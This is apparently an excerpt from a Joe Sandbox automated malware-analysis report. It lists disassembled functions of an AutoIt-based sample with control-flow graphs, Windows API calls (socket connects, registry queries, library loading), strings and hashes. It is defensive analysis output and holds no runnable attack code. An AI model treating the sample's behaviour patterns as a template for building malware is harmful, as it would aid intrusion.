                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                  • Opcode ID: cfc8844cb0cd3ec1ea9a343f288f3b7905beb2b470dbfa382ee48da5ed44e7a0
                                                                                                                                  • Instruction ID: f55a65c681ff77ced24a81a8ac63d23ecec0727c62b26896139d7ad5ff921979
                                                                                                                                  • Opcode Fuzzy Hash: cfc8844cb0cd3ec1ea9a343f288f3b7905beb2b470dbfa382ee48da5ed44e7a0
                                                                                                                                  • Instruction Fuzzy Hash: 3FD1C435504301DFC715EF24C895B6ABBE1AF89324F18845DF895AB2E2DB31EC41EB62
                                                                                                                                  Function 00EFC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1572 efc8b7-efc8f1 1573 efccfb-efccff 1572->1573 1574 efc8f7-efc8fa 1572->1574 1575 efcd04-efcd05 1573->1575 1574->1573 1576 efc900-efc903 1574->1576 1577 efcd06 call efc235 1575->1577 1576->1573 1578 efc909-efc912 call efcff8 1576->1578 1581 efcd0b-efcd0f 1577->1581 1583 efc925-efc92e call eebe14 1578->1583 1584 efc914-efc920 1578->1584 1587 efc934-efc93a 1583->1587 1588 efcc61-efcc6c call ead2c0 1583->1588 1584->1577 1589 efc93c-efc93e 1587->1589 1590 efc940 1587->1590 1596 efcc6e-efcc72 1588->1596 1597 efcca9-efccb4 call ead2c0 1588->1597 1592 efc942-efc94a 1589->1592 1590->1592 1594 efccec-efccf4 1592->1594 1595 efc950-efc967 call edabf3 1592->1595 1594->1573 1606 efc969-efc96e 1595->1606 1607 efc973-efc97f 1595->1607 1600 efcc78 1596->1600 1601 efcc74-efcc76 1596->1601 1597->1594 1605 efccb6-efccba 1597->1605 1604 efcc7a-efcc98 call ebd6b4 call ee97b6 1600->1604 1601->1604 1622 efcc99-efcca7 call eed7e4 1604->1622 1609 efccbc-efccbe 1605->1609 1610 efccc0 1605->1610 1606->1575 1611 efc9ce-efc9f9 call ebfa89 1607->1611 1612 efc981-efc98d 1607->1612 1615 efccc2-efccea call ebd6b4 call ee503c call eb2570 1609->1615 1610->1615 1623 efc9fb-efca16 call ebac65 1611->1623 1624 efca18-efca1a 1611->1624 1612->1611 1616 efc98f-efc99c call eda8c8 1612->1616 1615->1622 1626 efc9a1-efc9a6 1616->1626 1622->1581 1630 efca1d-efca24 1623->1630 1624->1630 1626->1611 1627 efc9a8-efc9af 1626->1627 1632 efc9be-efc9c5 1627->1632 1633 efc9b1-efc9b8 1627->1633 1636 efca26-efca30 1630->1636 1637 efca52-efca59 1630->1637 1632->1611 1642 efc9c7 1632->1642 1633->1632 1639 efc9ba 1633->1639 1643 efca32-efca48 call eda25b 1636->1643 1640 efcadf-efcaec 1637->1640 1641 efca5f-efca66 1637->1641 1639->1632 1647 efcaee-efcaf8 1640->1647 1648 efcafb-efcb28 VariantInit call ec1970 1640->1648 1641->1640 1646 efca68-efca7b 1641->1646 1642->1611 1654 efca4a-efca50 1643->1654 1651 efca7c-efca84 1646->1651 1647->1648 1657 efcb2d-efcb30 1648->1657 1658 efcb2a-efcb2b 1648->1658 1655 efca86-efcaa3 VariantClear 1651->1655 1656 efcad1-efcada 1651->1656 1654->1637 1659 efcabc-efcacc 1655->1659 1660 efcaa5-efcab9 SysAllocString 1655->1660 1656->1651 1661 efcadc 1656->1661 1662 efcb31-efcb43 1657->1662 1658->1662 1659->1656 1663 efcace 1659->1663 1660->1659 1661->1640 1664 efcb47-efcb4c 1662->1664 1663->1656 1665 efcb4e-efcb52 1664->1665 1666 efcb8a-efcb8c 1664->1666 1667 efcb54-efcb86 1665->1667 1668 efcba1-efcba5 1665->1668 1669 efcb8e-efcb95 1666->1669 1670 efcbb4-efcbd5 call eed7e4 call eea6f6 1666->1670 1667->1666 1673 efcba6-efcbaf call efc235 1668->1673 1669->1668 1672 efcb97-efcb9f 1669->1672 1678 efcc41-efcc50 VariantClear 1670->1678 1682 efcbd7-efcbe0 1670->1682 1672->1673 1673->1678 1680 efcc5a-efcc5c 1678->1680 1681 efcc52-efcc55 call ee1693 1678->1681 1680->1581 1681->1680 1684 efcbe2-efcbef 1682->1684 1685 efcc38-efcc3f 1684->1685 1686 efcbf1-efcbf8 1684->1686 1685->1678 1685->1684 1687 efcbfa-efcc0a 1686->1687 1688 efcc26-efcc2a 1686->1688 1687->1685 1689 efcc0c-efcc14 1687->1689 1690 efcc2c-efcc2e 1688->1690 1691 efcc30 1688->1691 1689->1688 1692 efcc16-efcc1c 1689->1692 1693 efcc32-efcc33 call eea6f6 1690->1693 1691->1693 1692->1688 1695 efcc1e-efcc24 1692->1695 1693->1685 1695->1685 1695->1688
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                  • Opcode ID: 3459f00350184f428910db53040e549e34a07c9ad3ec9ec90f6c513f84bab7d6
                                                                                                                                  • Instruction ID: bb4a0654f55b0773b5b3f7852ca6ef71dcb16bf07341645a81bd6d00aaf26101
                                                                                                                                  • Opcode Fuzzy Hash: 3459f00350184f428910db53040e549e34a07c9ad3ec9ec90f6c513f84bab7d6
                                                                                                                                  • Instruction Fuzzy Hash: E3E1A171A0021DABDF14DF64CA81AFEB7B5EF48314F349469EA45BB281D770AD41CB50
                                                                                                                                  Function 00EFBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1696 efbf80-efbfe1 call ec1970 1699 efc21b-efc21d 1696->1699 1700 efbfe7-efbfeb 1696->1700 1702 efc21e-efc21f 1699->1702 1700->1699 1701 efbff1-efbff6 1700->1701 1701->1699 1703 efbffc-efc00b call eebe14 1701->1703 1704 efc224-efc226 1702->1704 1710 efc158-efc15c 1703->1710 1711 efc011-efc015 1703->1711 1706 efc227 1704->1706 1707 efc229 call efc235 1706->1707 1714 efc22e-efc232 1707->1714 1712 efc15e-efc160 1710->1712 1713 efc16d 1710->1713 1715 efc01b 1711->1715 1716 efc017-efc019 1711->1716 1717 efc16f-efc171 1712->1717 1713->1717 1718 efc01d-efc01f 1715->1718 1716->1718 1717->1702 1719 efc177-efc17b 1717->1719 1720 efc033-efc03e 1718->1720 1721 efc021-efc025 1718->1721 1722 efc17d-efc17f 1719->1722 1723 efc181 1719->1723 1720->1706 1721->1720 1724 efc027-efc031 1721->1724 1725 efc183-efc186 1722->1725 1723->1725 1724->1720 1726 efc043-efc05f 1724->1726 1727 efc188-efc18e 1725->1727 1728 efc193-efc197 1725->1728 1732 efc067-efc081 1726->1732 1733 efc061-efc065 1726->1733 1727->1704 1730 efc19d 1728->1730 1731 efc199-efc19b 1728->1731 1734 efc19f-efc1c9 VariantInit VariantClear 1730->1734 1731->1734 1741 efc089 1732->1741 1742 efc083-efc087 1732->1742 1733->1732 1735 efc090-efc0e5 call ebfa89 VariantInit call ec1a00 1733->1735 1739 efc1cb-efc1cd 1734->1739 1740 efc1e6-efc1ea 1734->1740 1758 efc108-efc10d 1735->1758 1759 efc0e7-efc0f1 1735->1759 1739->1740 1744 efc1cf-efc1e1 call eb2570 1739->1744 1745 efc1ec-efc1ee 1740->1745 1746 efc1f0-efc1fe call eb2570 1740->1746 1741->1735 1742->1735 1742->1741 1755 efc0fb-efc0fe 1744->1755 1745->1746 1748 efc201-efc219 call eea6f6 VariantClear 1745->1748 1746->1748 1748->1714 1755->1707 1760 efc10f-efc131 1758->1760 1761 efc162-efc16b 1758->1761 1762 efc103-efc106 1759->1762 1763 efc0f3-efc0fa 1759->1763 1766 efc13b-efc13d 1760->1766 1767 efc133-efc139 1760->1767 1761->1755 1762->1755 1763->1755 1768 efc141-efc157 call eea6f6 1766->1768 1767->1755 1768->1710
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                  • Opcode ID: 6cdd67b68d6cadd53c191b80d57d65140622f46d719b007dd00883a1f57e8853
                                                                                                                                  • Instruction ID: f6aa91025bb86e9df3af18a54a8924d2fc7ab9cf77b08445175b0ff4f9f88136
                                                                                                                                  • Opcode Fuzzy Hash: 6cdd67b68d6cadd53c191b80d57d65140622f46d719b007dd00883a1f57e8853
                                                                                                                                  • Instruction Fuzzy Hash: 0D91BD71A0020DABDB24CFA4C944FAEBBB8EF45714F309159FA15BB291D7709946CBA0
                                                                                                                                  Function 00EA3DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EA34E2,?,00000001), ref: 00EA3FCD
                                                                                                                                  • _free.LIBCMT ref: 00F13C27
                                                                                                                                  • _free.LIBCMT ref: 00F13C6E
                                                                                                                                    • Part of subcall function 00EABDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00F622E8,?,00000000,?,00EA3E2E,?,00000000,?,00F3DBF0,00000000,?), ref: 00EABE8B
                                                                                                                                    • Part of subcall function 00EABDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00EA3E2E,?,00000000,?,00F3DBF0,00000000,?,00000002), ref: 00EABEA7
                                                                                                                                    • Part of subcall function 00EABDF0: __wsplitpath.LIBCMT ref: 00EABF19
                                                                                                                                    • Part of subcall function 00EABDF0: _wcscpy.LIBCMT ref: 00EABF31
                                                                                                                                    • Part of subcall function 00EABDF0: _wcscat.LIBCMT ref: 00EABF46
                                                                                                                                    • Part of subcall function 00EABDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00EABF56
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<$G-
                                                                                                                                  • API String ID: 1510338132-2169190053
                                                                                                                                  • Opcode ID: 4d01f0c9b5b5f5fdc86915ceff37baf8fbec35a38e7eeb013b5f052fcfe4f4fd
                                                                                                                                  • Instruction ID: 999ae6b22154a1ee921038cddf667e144cea15b1fc536e8ea96ed4bd441a6410
                                                                                                                                  • Opcode Fuzzy Hash: 4d01f0c9b5b5f5fdc86915ceff37baf8fbec35a38e7eeb013b5f052fcfe4f4fd
                                                                                                                                  • Instruction Fuzzy Hash: A9915D72910259AFCF04EFA4CC919EEB7B4BF09310F145429F416BB291EB34AE45DB50
                                                                                                                                  Function 00EBEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00EBEADA,?,?), ref: 00EBEB27
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00EBEADA,?,?), ref: 00F14B26
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00EBEADA,?,?), ref: 00F14B65
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00EBEADA,?,?), ref: 00F14B94
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                                  • Opcode ID: 1a540a12138a12d29a67b70534265650daaea1c74767f4aaeb1d96d2e971d768
                                                                                                                                  • Instruction ID: 4d7561fd80001690f646c33b52d1281b159d2f943c034d46b7b354ad30b9c61a
                                                                                                                                  • Opcode Fuzzy Hash: 1a540a12138a12d29a67b70534265650daaea1c74767f4aaeb1d96d2e971d768
                                                                                                                                  • Instruction Fuzzy Hash: B3114271A0510CBEEB14DBA4DD86EFE7BBCEF44354F101059F506E61A0DA70AE41E750
                                                                                                                                  Function 00EA2E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EA2ECB
                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EA2EEC
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00EA2F00
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00EA2F09
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                  • Opcode ID: 218fea915081f4e3151318995c1e4d2829ab63b8c41b9a41aa366bfa8be49798
                                                                                                                                  • Instruction ID: b2b68fdff1d8431b73f5e46d38a3ff6652b9be11c8874a22de3b473fd1dc4755
                                                                                                                                  • Opcode Fuzzy Hash: 218fea915081f4e3151318995c1e4d2829ab63b8c41b9a41aa366bfa8be49798
                                                                                                                                  • Instruction Fuzzy Hash: 9BF03A70A402D87AEB305763AC08E673E7EE7C7F20F05401EFA19A21A0C1A50881FAB0
                                                                                                                                  Function 00EF936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00EF9409
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF9416
                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00EF943A
                                                                                                                                  • _strlen.LIBCMT ref: 00EF9484
                                                                                                                                  • _memmove.LIBCMT ref: 00EF94CA
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF94F7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2795762555-0
                                                                                                                                  • Opcode ID: ef3855f0f74274d859e5d322168a174244553551c5a16a0e5cfd61997702eacc
                                                                                                                                  • Instruction ID: e558c0736a714af00b60efd715b15fc3ede9affdbfbe8209b3404de9b650ec3a
                                                                                                                                  • Opcode Fuzzy Hash: ef3855f0f74274d859e5d322168a174244553551c5a16a0e5cfd61997702eacc
                                                                                                                                  • Instruction Fuzzy Hash: 6F416F75500108AFCB14EB64CD85BAEB7B9EF58314F205169F616AB292DB34AE41CB60
                                                                                                                                  Function 00EE6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3B1E: _wcsncpy.LIBCMT ref: 00EA3B32
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00EE6DBA
                                                                                                                                  • GetLastError.KERNEL32 ref: 00EE6DC5
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EE6DD9
                                                                                                                                  • _wcsrchr.LIBCMT ref: 00EE6DFB
                                                                                                                                    • Part of subcall function 00EE6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00EE6E31
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3633006590-0
                                                                                                                                  • Opcode ID: 1f583b584ae24fd080dcc8d0c40386f9144c53b4ef1c005ad9b4c015df25200e
                                                                                                                                  • Instruction ID: c3c47ebb144290c8e64ecfc7209620d17561405948d3520ae0ec2b1df7229fad
                                                                                                                                  • Opcode Fuzzy Hash: 1f583b584ae24fd080dcc8d0c40386f9144c53b4ef1c005ad9b4c015df25200e
                                                                                                                                  • Instruction Fuzzy Hash: 2D212735A0131C9ADF2077B5EC4ABEA33ACCF21394F602155E020F30E2EB20CE859650
                                                                                                                                  Function 00EF9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EFACD3: inet_addr.WS2_32(00000000), ref: 00EFACF5
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00EF9160
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF916F
                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00EF918B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3701255441-0
                                                                                                                                  • Opcode ID: 6fc07e46b1fa215def14cdaa413e39e9d256374041fde9e59a1f3ff39b1c016d
                                                                                                                                  • Instruction ID: 478527f501f7e2fd10761f1a7e6adb9e0e2ec3e870d706962e94df8e77cc8f69
                                                                                                                                  • Opcode Fuzzy Hash: 6fc07e46b1fa215def14cdaa413e39e9d256374041fde9e59a1f3ff39b1c016d
                                                                                                                                  • Instruction Fuzzy Hash: 9721C0312002189FDB10AF68CC89B7EB7E9EF48724F059019FA56BB392CB74EC018B51
                                                                                                                                  Function 00EA3A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SHGetMalloc.SHELL32(1<), ref: 00EA3A7D
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00EA3AD2
                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00EA3A8F
                                                                                                                                    • Part of subcall function 00EA3B1E: _wcsncpy.LIBCMT ref: 00EA3B32
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                  • String ID: 1<
